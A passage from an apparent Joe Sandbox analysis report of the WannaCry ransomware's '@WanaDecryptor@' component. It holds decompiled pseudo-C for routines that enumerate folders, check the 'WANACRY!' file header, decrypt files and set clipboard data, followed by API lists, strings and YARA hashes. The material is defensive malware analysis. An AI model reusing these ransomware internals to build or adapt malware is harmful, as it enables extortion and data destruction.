					_push( *((intOrPtr*)(_t242 + 0x20)));
					L00412C98();
					_t240 = _t242 + 4;
					_t125 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
				return _t125;
			}




































                                                      0x004026b0
                                                      0x004026b2
                                                      0x004026bd
                                                      0x004026be
                                                      0x004026c5
                                                      0x004026d3
                                                      0x004026db
                                                      0x004026e4
                                                      0x004026e8
                                                      0x004026f1
                                                      0x004026fa
                                                      0x00402706
                                                      0x0040270a
                                                      0x00402720
                                                      0x00402728
                                                      0x0040272e
                                                      0x0040273e
                                                      0x00402747
                                                      0x0040274b
                                                      0x004027c2
                                                      0x004027c2
                                                      0x004027ca
                                                      0x00000000
                                                      0x00000000
                                                      0x004027e1
                                                      0x004027e3
                                                      0x004027e8
                                                      0x004027fb
                                                      0x004027fd
                                                      0x00402802
                                                      0x00402816
                                                      0x00402822
                                                      0x00402828
                                                      0x00402838
                                                      0x004028c3
                                                      0x004028c5
                                                      0x004028ca
                                                      0x004028dd
                                                      0x004028df
                                                      0x004028e4
                                                      0x004028f3
                                                      0x004028f5
                                                      0x004028fa
                                                      0x00402905
                                                      0x00402909
                                                      0x00402914
                                                      0x00402916
                                                      0x00402923
                                                      0x0040293c
                                                      0x00402944
                                                      0x00402949
                                                      0x00402951
                                                      0x00000000
                                                      0x00402953
                                                      0x004028fa
                                                      0x004028e4
                                                      0x0040283a
                                                      0x00402850
                                                      0x0040285f
                                                      0x00402863
                                                      0x0040286e
                                                      0x00402870
                                                      0x0040287d
                                                      0x00402896
                                                      0x0040289e
                                                      0x004028a3
                                                      0x004028ab
                                                      0x00402957
                                                      0x00402957
                                                      0x00402957
                                                      0x00402850
                                                      0x00402838
                                                      0x00402802
                                                      0x00402972
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402972
                                                      0x0040297d
                                                      0x00402983
                                                      0x00402987
                                                      0x0040298b
                                                      0x0040298d
                                                      0x0040298d
                                                      0x00402995
                                                      0x00000000
                                                      0x00000000
                                                      0x0040299b
                                                      0x004029a0
                                                      0x004029a2
                                                      0x004029a2
                                                      0x004029aa
                                                      0x004029af
                                                      0x004029b7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004029b7
                                                      0x0040298d
                                                      0x004029b9
                                                      0x004029b9
                                                      0x004029bd
                                                      0x004029c1
                                                      0x004029c3
                                                      0x004029c3
                                                      0x004029cb
                                                      0x00000000
                                                      0x00000000
                                                      0x004029d1
                                                      0x004029d6
                                                      0x004029d8
                                                      0x004029d8
                                                      0x004029e0
                                                      0x004029e5
                                                      0x004029ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004029ed
                                                      0x004029c3
                                                      0x004029ef
                                                      0x004029ef
                                                      0x00402a0c
                                                      0x00402a0e
                                                      0x00402a16
                                                      0x00402a2c
                                                      0x00402a2e
                                                      0x00402a36
                                                      0x00402a3c
                                                      0x00402a40
                                                      0x00402a47
                                                      0x00402a49
                                                      0x00402a4d
                                                      0x00402a4f
                                                      0x00402a4f
                                                      0x00402a51
                                                      0x00402a5d
                                                      0x00402a62
                                                      0x00402a66
                                                      0x00402a66
                                                      0x00402a6a
                                                      0x00402a6b
                                                      0x00402a70
                                                      0x00402a74
                                                      0x00402a78
                                                      0x00402a7c
                                                      0x00402a7f
                                                      0x00402a81
                                                      0x00402a8e
                                                      0x00402a92
                                                      0x00402a94
                                                      0x00402a98
                                                      0x00402aaf
                                                      0x00402ab4
                                                      0x00402a94
                                                      0x00402abe
                                                      0x00402abf
                                                      0x00402ac4
                                                      0x00402ac7
                                                      0x0040274d
                                                      0x00402751
                                                      0x00402765
                                                      0x0040276e
                                                      0x0040276f
                                                      0x00402778
                                                      0x0040277b
                                                      0x0040277f
                                                      0x00402790
                                                      0x0040279b
                                                      0x004027a4
                                                      0x004027a5
                                                      0x004027aa
                                                      0x004027ad
                                                      0x004027ad
                                                      0x00402ad7
                                                      0x00402ae4

                                                      APIs
                                                        • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                                      • swprintf.MSVCRT ref: 00402728
                                                      • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                                      • #825.MFC42(?,?,?,?), ref: 0040276F
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?), ref: 004027A5
                                                      • wcscmp.MSVCRT ref: 004027E1
                                                      • wcscmp.MSVCRT ref: 004027FB
                                                      • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                                      • wcslen.MSVCRT ref: 0040286E
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                                      • FindClose.KERNEL32(?), ref: 0040297D
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                                      • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                                      • API String ID: 1037557366-268640142
                                                      • Opcode ID: 68c0da3c818e992a567790c9a9b65803973eb8845537bfb51ade59474b63f593
                                                      • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                                      • Opcode Fuzzy Hash: 68c0da3c818e992a567790c9a9b65803973eb8845537bfb51ade59474b63f593
                                                      • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004020A0 Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 359filetimeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 73%
                                                      			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				long _v36;
				union _LARGE_INTEGER* _v40;
				void _v44;
				char _v48;
				char _v560;
				struct _OVERLAPPED* _v564;
				union _LARGE_INTEGER* _v568;
				void _v572;
				char _v573;
				short _v575;
				intOrPtr _v579;
				void _v580;
				struct _FILETIME _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				void* _v608;
				void _v612;
				void _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __ebp;
				int _t109;
				int _t113;
				int _t115;
				int _t116;
				int _t118;
				void* _t119;
				signed int _t122;
				signed int _t137;
				signed int _t139;
				int _t140;
				signed int _t141;
				int _t145;
				signed int _t148;
				int _t152;
				int _t155;
				void* _t159;
				intOrPtr _t196;
				signed int _t212;
				signed int _t213;
				void* _t216;
				intOrPtr _t223;
				signed int _t224;
				void* _t226;
				intOrPtr _t227;

				_push(0xffffffff);
				_push(0x4158c8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t227;
				_push(_t212);
				_v624 = __ecx;
				_t213 = _t212 | 0xffffffff;
				_v620 = _t213;
				_v608 = _t213;
				_v48 = 0;
				_v616 = 0;
				_v580 = 0;
				_v579 = 0;
				_v575 = 0;
				_v573 = 0;
				_v612 = 0;
				_v36 = 0;
				_v32 = 0;
				_v564 = 0;
				_v8 = 0;
				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v620 = _t159;
				if(_t159 != _t213) {
					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
					__eflags = _t109;
					if(_t109 == 0) {
						L32:
						_push(0xffffffff);
						_push( &_v20);
						goto L33;
					} else {
						__eflags = 0;
						asm("repe cmpsd");
						if(0 != 0) {
							goto L32;
						} else {
							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L32;
							} else {
								__eflags = _v616 - 0x100;
								if(_v616 != 0x100) {
									goto L32;
								} else {
									_t223 = _v624;
									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
									__eflags = _t115;
									if(_t115 == 0) {
										goto L32;
									} else {
										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
										__eflags = _t116;
										if(_t116 == 0) {
											goto L32;
										} else {
											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
											__eflags = _t118;
											if(_t118 == 0) {
												goto L32;
											} else {
												__eflags = _v612 - 3;
												if(_v612 != 3) {
													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
													_t216 = _t119;
													_v608 = _t216;
													__eflags = _t216 - 0xffffffff;
													if(_t216 != 0xffffffff) {
														_push( &_v48);
														_push( &_v560);
														_t51 = _t223 + 4; // 0x4
														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
														__eflags = _t122;
														if(_t122 != 0) {
															L22:
															_t59 = _t223 + 0x54; // 0x54
															_push(0x10);
															_push(_v48);
															_t196 =  *0x4213b0; // 0x4218b0
															_push(_t196);
															_push( &_v560);
															E0040A150(_t59);
															_v44 = _v572;
															_v40 = _v568;
															while(1) {
																__eflags = _v40;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags > 0) {
																	L26:
																	_t139 =  *(_t223 + 0x4d0);
																	__eflags = _t139;
																	if(_t139 == 0) {
																		L28:
																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
																		__eflags = _t140;
																		if(_t140 == 0) {
																			L34:
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L33;
																		} else {
																			_t141 = _v36;
																			__eflags = _t141;
																			if(_t141 == 0) {
																				goto L34;
																			} else {
																				_v44 = _v44 - _t141;
																				asm("sbb dword [ebp-0x24], 0x0");
																				_t76 = _t223 + 0x54; // 0x54
																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
																				__eflags = _t145;
																				if(_t145 == 0) {
																					goto L32;
																				} else {
																					__eflags = _v32 - _v36;
																					if(_v32 == _v36) {
																						continue;
																					} else {
																						goto L32;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t139;
																		if( *_t139 != 0) {
																			goto L32;
																		} else {
																			goto L28;
																		}
																	}
																} else {
																	__eflags = _v44;
																	if(_v44 <= 0) {
																		break;
																	} else {
																		goto L26;
																	}
																}
																goto L41;
															}
															_push(0);
															SetFilePointerEx(_t216, _v572, _v568, 0);
															SetEndOfFile(_t216);
															goto L36;
														} else {
															_push( &_v48);
															_push( &_v560);
															_t56 = _t223 + 0x2c; // 0x2c
															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
															__eflags = _t148;
															if(_t148 != 0) {
																_v564 = 1;
																goto L22;
															} else {
																goto L20;
															}
														}
													} else {
														_push(_t119);
														_push( &_v20);
														goto L33;
													}
												} else {
													CloseHandle(_t159);
													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
													_v620 = _t159;
													__eflags = _t159 - 0xffffffff;
													if(_t159 == 0xffffffff) {
														goto L32;
													} else {
														SetFilePointer(_t159, 0xffff0000, 0, 2);
														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
														__eflags = _t152;
														if(_t152 == 0) {
															goto L32;
														} else {
															__eflags = _v36 - 0x10000;
															if(_v36 != 0x10000) {
																goto L32;
															} else {
																SetFilePointer(_t159, 0, 0, 0);
																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
																__eflags = _t155;
																if(_t155 == 0) {
																	L20:
																	_push(0xffffffff);
																	_push( &_v20);
																	goto L33;
																} else {
																	__eflags = _v32 - 0x10000;
																	if(_v32 != 0x10000) {
																		goto L20;
																	} else {
																		SetFilePointer(_t159, 0xffff0000, 0, 2);
																		SetEndOfFile(_t159);
																		_t216 = _v608;
																		L36:
																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
																		__eflags = _v612 - 3;
																		if(_v612 == 3) {
																			_t137 = CloseHandle(_t159) | 0xffffffff;
																			__eflags = _t137;
																			_v608 = _t137;
																			_v620 = _t137;
																			MoveFileW(_a4, _a8);
																		}
																		_t224 =  *(_t223 + 0x4d4);
																		__eflags = _t224;
																		if(_t224 != 0) {
																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
																		}
																		_push(0xffffffff);
																		_push( &_v20);
																		L00413056();
																		 *[fs:0x0] = _v20;
																		return 1;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_push(_t213);
					_push( &_v20);
					L33:
					L00413056();
					 *[fs:0x0] = _v20;
					return 0;
				}
				L41:
			}




















































                                                      0x004020a3
                                                      0x004020a5
                                                      0x004020aa
                                                      0x004020b5
                                                      0x004020b6
                                                      0x004020c5
                                                      0x004020c6
                                                      0x004020cc
                                                      0x004020cf
                                                      0x004020d5
                                                      0x004020dd
                                                      0x004020e0
                                                      0x004020e6
                                                      0x004020ef
                                                      0x004020f5
                                                      0x004020fc
                                                      0x00402102
                                                      0x00402108
                                                      0x0040210b
                                                      0x0040210e
                                                      0x00402114
                                                      0x0040212d
                                                      0x0040212f
                                                      0x00402137
                                                      0x00402159
                                                      0x0040216e
                                                      0x00402174
                                                      0x00402176
                                                      0x0040244c
                                                      0x0040244c
                                                      0x00402451
                                                      0x00000000
                                                      0x0040217c
                                                      0x0040218c
                                                      0x0040218e
                                                      0x00402190
                                                      0x00000000
                                                      0x00402196
                                                      0x004021a5
                                                      0x004021ab
                                                      0x004021ad
                                                      0x00000000
                                                      0x004021b3
                                                      0x004021b3
                                                      0x004021bd
                                                      0x00000000
                                                      0x004021c3
                                                      0x004021ce
                                                      0x004021dc
                                                      0x004021e2
                                                      0x004021e4
                                                      0x00000000
                                                      0x004021ea
                                                      0x004021fa
                                                      0x00402200
                                                      0x00402202
                                                      0x00000000
                                                      0x00402208
                                                      0x00402218
                                                      0x0040221e
                                                      0x00402220
                                                      0x00000000
                                                      0x00402226
                                                      0x00402226
                                                      0x0040222d
                                                      0x0040230f
                                                      0x00402315
                                                      0x00402317
                                                      0x0040231d
                                                      0x00402320
                                                      0x0040232f
                                                      0x00402336
                                                      0x00402345
                                                      0x00402348
                                                      0x0040234d
                                                      0x0040234f
                                                      0x0040238b
                                                      0x0040238b
                                                      0x0040238e
                                                      0x00402393
                                                      0x00402394
                                                      0x0040239a
                                                      0x004023a1
                                                      0x004023a2
                                                      0x004023ad
                                                      0x004023b6
                                                      0x004023b9
                                                      0x004023bc
                                                      0x004023be
                                                      0x00000000
                                                      0x00000000
                                                      0x004023c4
                                                      0x004023d1
                                                      0x004023d1
                                                      0x004023d7
                                                      0x004023d9
                                                      0x004023e0
                                                      0x004023f3
                                                      0x004023f9
                                                      0x004023fb
                                                      0x0040246f
                                                      0x0040246f
                                                      0x00402474
                                                      0x00000000
                                                      0x004023fd
                                                      0x004023fd
                                                      0x00402400
                                                      0x00402402
                                                      0x00000000
                                                      0x00402404
                                                      0x00402404
                                                      0x00402407
                                                      0x0040241c
                                                      0x0040241f
                                                      0x00402436
                                                      0x0040243c
                                                      0x0040243e
                                                      0x00000000
                                                      0x00402440
                                                      0x00402443
                                                      0x00402446
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402446
                                                      0x0040243e
                                                      0x00402402
                                                      0x004023db
                                                      0x004023db
                                                      0x004023de
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004023de
                                                      0x004023c6
                                                      0x004023c9
                                                      0x004023cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004023cb
                                                      0x00000000
                                                      0x004023c4
                                                      0x00402477
                                                      0x0040248a
                                                      0x00402491
                                                      0x00000000
                                                      0x00402351
                                                      0x00402354
                                                      0x0040235b
                                                      0x0040236a
                                                      0x0040236d
                                                      0x00402372
                                                      0x00402374
                                                      0x00402381
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402374
                                                      0x00402322
                                                      0x00402322
                                                      0x00402326
                                                      0x00000000
                                                      0x00402326
                                                      0x00402233
                                                      0x00402234
                                                      0x00402253
                                                      0x00402255
                                                      0x0040225b
                                                      0x0040225e
                                                      0x00000000
                                                      0x00402264
                                                      0x00402274
                                                      0x00402289
                                                      0x0040228f
                                                      0x00402291
                                                      0x00000000
                                                      0x00402297
                                                      0x00402297
                                                      0x0040229e
                                                      0x00000000
                                                      0x004022a4
                                                      0x004022ab
                                                      0x004022c0
                                                      0x004022c6
                                                      0x004022c8
                                                      0x00402376
                                                      0x00402376
                                                      0x0040237b
                                                      0x00000000
                                                      0x004022ce
                                                      0x004022ce
                                                      0x004022d5
                                                      0x00000000
                                                      0x004022db
                                                      0x004022e5
                                                      0x004022e8
                                                      0x004022ee
                                                      0x00402497
                                                      0x004024ad
                                                      0x004024b3
                                                      0x004024ba
                                                      0x004024c3
                                                      0x004024c3
                                                      0x004024c6
                                                      0x004024cc
                                                      0x004024da
                                                      0x004024da
                                                      0x004024e0
                                                      0x004024e6
                                                      0x004024e8
                                                      0x00402509
                                                      0x00402509
                                                      0x0040250b
                                                      0x00402510
                                                      0x00402511
                                                      0x00402521
                                                      0x0040252e
                                                      0x0040252e
                                                      0x004022d5
                                                      0x004022c8
                                                      0x0040229e
                                                      0x00402291
                                                      0x0040225e
                                                      0x0040222d
                                                      0x00402220
                                                      0x00402202
                                                      0x004021e4
                                                      0x004021bd
                                                      0x004021ad
                                                      0x00402190
                                                      0x00402139
                                                      0x00402139
                                                      0x0040213d
                                                      0x00402452
                                                      0x00402452
                                                      0x0040245f
                                                      0x0040246c
                                                      0x0040246c
                                                      0x00000000

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                                      • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                                      • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                                      • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                                      • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402234
                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                                      • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                                      • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                                      • _local_unwind2.MSVCRT ref: 00402452
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                                      • String ID: WANACRY!
                                                      • API String ID: 1586634678-1240840912
                                                      • Opcode ID: 99468a7adf92e140f18bc92f45e5389bbb3b22b5213984f8d8d7e9952fbc0adf
                                                      • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                                      • Opcode Fuzzy Hash: 99468a7adf92e140f18bc92f45e5389bbb3b22b5213984f8d8d7e9952fbc0adf
                                                      • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004035A0 Relevance: 36.2, APIs: 24, Instructions: 175windowclipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E004035A0(intOrPtr __ecx) {
				int _t51;
				void* _t54;
				long _t55;
				signed int _t64;
				signed int _t68;
				void* _t71;
				int _t78;
				short _t86;
				signed int _t92;
				intOrPtr _t110;
				int _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t128;
				intOrPtr _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_push(0xffffffff);
				_push(E0041365C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t129;
				_t130 = _t129 - 0x2e4;
				_t110 = __ecx;
				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
				if(_t51 != 0) {
					_t51 = OpenClipboard( *(_t110 + 0x20));
					if(_t51 != 0) {
						_t121 = 0;
						_t126 = 0;
						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
							do {
								_push(0);
								_t71 = _t130 + 0x18;
								_push(_t121);
								_push(_t71);
								L00412D7C();
								_push(0x4206e0);
								_push(_t71);
								_push(_t130 + 0x14);
								 *(_t130 + 0x308) = 0;
								L00412CCE();
								 *(_t130 + 0x2fc) = 2;
								L00412CC2();
								 *(_t130 + 0x2fc) = 0xffffffff;
								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
								L00412CC2();
								_t121 = _t121 + 1;
							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
						}
						_t122 = GlobalAlloc(2, _t126 + 2);
						 *(_t130 + 0x14) = _t122;
						if(_t122 != 0) {
							_t54 = GlobalLock(_t122);
							 *(_t130 + 0x10) = _t54;
							if(_t54 != 0) {
								_t78 = 0;
								_t128 = 0;
								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
								if(_t55 > 0) {
									while(1) {
										_push(0);
										_push(_t78);
										_push(_t130 + 0x24);
										L00412D7C();
										_push(0x4206e0);
										_push(_t55);
										 *((intOrPtr*)(_t130 + 0x304)) = 3;
										_push(_t130 + 0x24);
										L00412CCE();
										 *(_t130 + 0x2fc) = 5;
										L00412CC2();
										_t86 =  *0x42179c; // 0x0
										 *(_t130 + 0x24) = _t86;
										memset(_t130 + 0x26, 0, 0xb3 << 2);
										_t132 = _t130 + 0xc;
										asm("stosw");
										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
										_t64 = wcslen(_t132 + 0x24);
										_t123 = _t132 + 0x28;
										_t92 = _t64 << 1 >> 2;
										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
										_t134 = _t132 + 0x18;
										_t68 = wcslen(_t134 + 0x28);
										_t130 = _t134 + 8;
										_t128 = _t128 + _t68 * 2;
										 *(_t130 + 0x2fc) = 0xffffffff;
										L00412CC2();
										_t78 = _t78 + 1;
										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
										if(_t78 >= _t55) {
											break;
										}
										_t110 =  *((intOrPtr*)(_t130 + 0x18));
									}
									_t122 =  *(_t130 + 0x14);
								}
								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
								GlobalUnlock(_t122);
								EmptyClipboard();
								SetClipboardData(0xd, _t122);
							} else {
								GlobalFree(_t122);
							}
						}
						_t51 = CloseClipboard();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
				return _t51;
			}






















                                                      0x004035a0
                                                      0x004035a2
                                                      0x004035ad
                                                      0x004035ae
                                                      0x004035b5
                                                      0x004035c5
                                                      0x004035d7
                                                      0x004035db
                                                      0x004035df
                                                      0x004035e9
                                                      0x004035f1
                                                      0x004035fd
                                                      0x00403607
                                                      0x0040360d
                                                      0x0040360f
                                                      0x0040360f
                                                      0x00403611
                                                      0x00403615
                                                      0x00403616
                                                      0x0040361a
                                                      0x0040361f
                                                      0x00403628
                                                      0x00403629
                                                      0x0040362a
                                                      0x00403635
                                                      0x0040363e
                                                      0x00403646
                                                      0x00403653
                                                      0x00403661
                                                      0x00403665
                                                      0x0040367a
                                                      0x0040367d
                                                      0x0040360f
                                                      0x0040368d
                                                      0x00403691
                                                      0x00403695
                                                      0x0040369c
                                                      0x004036a4
                                                      0x004036a8
                                                      0x004036bc
                                                      0x004036c6
                                                      0x004036c8
                                                      0x004036d0
                                                      0x004036dc
                                                      0x004036dc
                                                      0x004036e2
                                                      0x004036e3
                                                      0x004036e7
                                                      0x004036ec
                                                      0x004036f1
                                                      0x004036f6
                                                      0x00403701
                                                      0x00403702
                                                      0x0040370b
                                                      0x00403713
                                                      0x00403718
                                                      0x00403721
                                                      0x00403733
                                                      0x00403733
                                                      0x00403735
                                                      0x00403748
                                                      0x00403753
                                                      0x00403763
                                                      0x0040376a
                                                      0x00403774
                                                      0x00403774
                                                      0x0040377b
                                                      0x00403781
                                                      0x00403788
                                                      0x0040378c
                                                      0x00403797
                                                      0x004037af
                                                      0x004037b1
                                                      0x004037b9
                                                      0x00000000
                                                      0x00000000
                                                      0x004036d8
                                                      0x004036d8
                                                      0x004037bf
                                                      0x004037bf
                                                      0x004037c8
                                                      0x004037ce
                                                      0x004037d4
                                                      0x004037dd
                                                      0x004036aa
                                                      0x004036ab
                                                      0x004036ab
                                                      0x004036a8
                                                      0x004037e3
                                                      0x004037e3
                                                      0x004035f1
                                                      0x004037f4
                                                      0x00403801

                                                      APIs
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                                      • OpenClipboard.USER32(?), ref: 004035E9
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                                      • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                                      • #924.MFC42 ref: 00403635
                                                      • #800.MFC42 ref: 00403646
                                                      • #800.MFC42 ref: 00403665
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                                      • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                                      • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                                      • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                                      • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                                      • #924.MFC42(00000000), ref: 00403702
                                                      • #800.MFC42(00000000), ref: 00403713
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                                      • wcslen.MSVCRT ref: 00403753
                                                      • wcslen.MSVCRT ref: 0040377B
                                                      • #800.MFC42 ref: 00403797
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                                      • EmptyClipboard.USER32 ref: 004037D4
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                                      • CloseClipboard.USER32 ref: 004037E3
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
